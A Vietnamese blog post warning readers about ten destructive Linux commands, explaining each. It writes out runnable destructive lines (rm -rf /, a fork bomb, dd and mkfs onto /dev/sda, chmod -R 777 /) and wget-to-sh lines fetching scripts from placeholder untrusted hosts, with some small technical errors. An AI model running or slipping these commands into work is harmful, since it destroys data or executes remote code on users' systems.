Hệ điều hành Linux cho người dùng độc lập hơn so với Windows hoặc bất kỳ hệ điều hành nào khác. Mặc dù đối với một số nhà phát triển có kinh nghiệm, hệ điều hành Linux cho người dùng tự do hơn để thực hiện các hoạt động, nhưng nó cũng nguy hiểm không kém. Mặc dù mọi công nghệ đều có ưu và khuyết điểm riêng. Nhưng điều quan trọng nhất là người dùng phải hiểu được lệnh trước khi thực hiện. Vậy nên trong bài viết này, mình sẽ liệt kê ra 10 lệnh Linux chết người mà bạn không bao giờ nên chạy.
10 lệnh Linux chết người mà bạn không bao giờ nên chạy
1. Xóa đệ quy
Một trong những cách nhanh nhất để xóa thư mục và nội dung của nó là dùng lệnh rm -rf
. Lệnh này sẽ xóa sạch mọi thứ trong tệp, thư mục hoặc ổ cứng mà lệnh đang chạy. Mình sẽ chia nhỏ lệnh ra để dễ hiểu hơn:
rm – Xóa tất cả các tệp ở vị trí đã cho
-rf – Lệnh này được chia thành hai phần: r và f. r cho phép bạn xóa tất cả các tệp một cách đệ quy trong khi f có nghĩa là xóa tất cả các tệp mà không cần nhắc người dùng.
Có một số biến thể của lệnh này trên mạng, nhưng điểm chung của các lệnh này là sẽ xóa sạch mọi dữ liệu trên thư mục lệnh đang chạy. Dữ liệu bị mất từ lệnh này không thể phục hồi theo bất kỳ cách nào.
- rm – Lệnh này được sử dụng để xóa tất cả các tệp trong đường dẫn mà bạn sẽ cung cấp
- rm -r – Lệnh này được sử dụng để xóa các tệp một cách đệ quy khỏi tất cả các thư mục và thư mục con trong Hệ điều hành Linux.
- rm -f – Lệnh này được sử dụng để xóa các tệp trên đường dẫn được cung cấp mà không cần nhắc người dùng. Bao gồm cả xóa “Read Only Files”.
- rm -rf / – Đây là một trong những lệnh nguy hiểm nhất vì / là thư mục gốc của hệ điều hành. Khi lệnh này được chạy, nó sẽ xóa đệ quy tất cả nội dung của thư mục gốc. Như vậy, tất cả các thư mục và thư mục con của bạn sẽ bị xóa và dữ liệu sẽ bị mất.
- rm -rf * – Lệnh này xóa tất cả dữ liệu trong thư mục đang làm việc
- rm -rf. – Lệnh này xóa các tệp trong thư mục làm việc hiện tại cũng như các thư mục con. Nó cũng xóa tất cả các tệp cấu hình trong thư mục.
2. Fork Bomb
Đây là một hàm bash đơn giản mà sau khi được thực thi sẽ tạo ra các bản sao của chính nó. Do đó gây tốn thời gian và tài nguyên bộ nhớ của CPU. Lệnh này sẽ chạy đệ quy cho đến khi hệ thống bị đóng băng.
:(){:|:&};:
3. Ghi đè ổ cứng
Nếu bạn thực hiện lệnh dưới trên ổ cứng của mình, thì việc khôi phục dữ liệu là hoàn toàn không thể.
command > dev/sda
Lệnh này ghi dữ liệu thô vào ổ cứng bạn muốn. Điều này dẫn đến mất dữ liệu trong ổ cứng hoặc phân vùng trong lệnh. Mình sẽ chia nhỏ lệnh ra cho dễ hiểu.
command – Đây có thể là bất kỳ lệnh nào được nhập bởi người dùng > – Chịu trách nhiệm gửi đầu ra của lệnh đến vị trí đã nhập dev/ sda – Đầu ra của lệnh sẽ được ghi vào vị trí này. Vì vậy, hãy cẩn thận khi sử dụng lệnh có vị trí ổ cứng chẳng hạn như dev/sda.
4. Mã hóa ổ cứng
Trong mọi hệ thống Linux, dev/null là một vị trí đặc biệt được ví như một lỗ đen. Bất cứ thứ gì di chuyển đến lỗ đen này đều bị phá hủy. Nếu bạn vô tình di chuyển dữ liệu của mình vào thư mục này, dữ liệu của bạn sẽ không được khôi phục.
mv /home/root/* dev/null
Lệnh trên sẽ di chuyển tất cả dữ liệu trong thư mục home/root vào dev/null, dẫn đến mất dữ liệu. Mình sẽ chia nhỏ lệnh ra cho dễ hiểu.
mv – Lệnh này được sử dụng để di chuyển một thư mục đến một vị trí khác
/home/root/ * – Đây là vị trí của thư mục sẽ được di chuyển
dev/null – Vị trí đặc biệt được ví như lỗ đen
Vì vậy, bạn nên cẩn thận trong khi chạy lệnh này.
5. Tải các tập lệnh độc hại
Tất cả chúng ta đều nhận thức được lợi ích của lệnh “wget” trong Linux nhưng điều mà chúng ta không biết là nó có thể tải xuống các tập lệnh và vi rút độc hại cũng như phần mềm có lợi. Nếu bạn tình cờ chạy một trong các lệnh sau, thì bạn nên cẩn thận.
wget http://malicious_source -o- | sh
wget http://example.com/something -o- | sh -
wget http: //an-untrusted-url -o- | sh
Các lệnh trên tải xuống nội dung từ URL được cung cấp và chạy tập lệnh đã tải xuống.
6. Định dạng ổ cứng
Có một lệnh khác để xóa ổ cứng của bạn và định dạng lại ổ cứng. Nhưng lệnh này chỉ nên được sử dụng trong trường hợp bạn đã sao lưu dữ liệu của mình trên đám mây hoặc thiết bị bên ngoài.
mkfs.ext3 /dev/sda
Chạy lệnh này giống như format ổ C trong windows, trong đó tất cả tệp sẽ được xóa sạch khỏi ổ đĩa. Để bạn dễ hiểu hơn, hãy chia nhỏ lệnh này.
mkfs.ext3 - Tạo ra một hệ thống tệp ext3 mới trên ổ cứng.
dev/sda - Chỉ định phân vùng đầu tiên trên ổ cứng.
Khi lệnh này được thực thi, nó sẽ định dạng phân vùng được chỉ định trên ổ cứng theo ext3.
7. Ghi nội dung file
Lệnh xóa nội dung tệp là một lệnh dễ dàng và có thể được thực thi trong bất kỳ trường hợp nào.
>file
Toán tử >
chuyển hướng đầu ra thành một file và ghi đè lên nội dung của file đó. Ví dụ:
echo "first statement" > file1.txt
Lệnh trên sẽ ghi dòng chữ first statement
vào file file1.txt
.
8. Chỉnh sửa lệnh trước
Lệnh này là một cao dao hai lưỡi. Mặc dù nó giúp bạn không phải gõ lại tất cả lệnh trước đó và thực thi nó dễ dàng hơn, nhưng nó cũng có thể truyền nội dung độc hại vào lệnh đã chạy trước đó của bạn. Do đó, bạn cần cân nhắc sử dụng lệnh này.
^foo^bar
9. Ghi dữ liệu ngẫu nhiên vào ổ cứng
Nếu bạn đã từng gặp lệnh dưới, thì xin chúc mừng, bạn cũng có thể đã thấy dữ liệu ngẫu nhiên được ghi vào ổ cứng của mình nếu bạn đủ điên để thực hiện lệnh này. Hậu quả của lệnh này là hệ thống của bạn sẽ không được phục hồi.
dd if=/dev/random of=/dev/sda
10. Chmod -R 777 /
Lệnh này không ảnh hưởng hệ thống của bạn về mặt vật lý như tất cả các lệnh khác nhưng lệnh này dẫn đến vi phạm bảo mật trên hệ thống. Bằng cách thực hiện lệnh này, bạn đang cung cấp cho tất cả người dùng của hệ thống khả năng đọc, ghi và thực thi dữ liệu trên hệ thống tệp của bạn. Do đó, hãy sử dụng lệnh này một cách khôn ngoan.
Mình hy vọng các lệnh linux chết người này sẽ giúp bạn không bị mất dữ liệu của mình. Ngoài ra, bạn cũng có thể xem hêm các lệnh cmd nguy hiểm tại đây.
Xem Them Chi Tiet
Nhung Mon Do Cong Nghe Duoc Yeu Thich
Do Cong Nghe Phu Kien
Xem Them Chi Tiet
Phu nu phai dep dan ong moi yeu! Sam ngay bo vay dam sieu dep
Thanh xuan nhu mot tach trá Khong mua do hot phi hoai thanh xuan
Xem Them Chi Tiet
Nhung Mon Do Cong Nghe Duoc Yeu Thich
Do Cong Nghe Phu Kien
Không có nhận xét nào:
Đăng nhận xét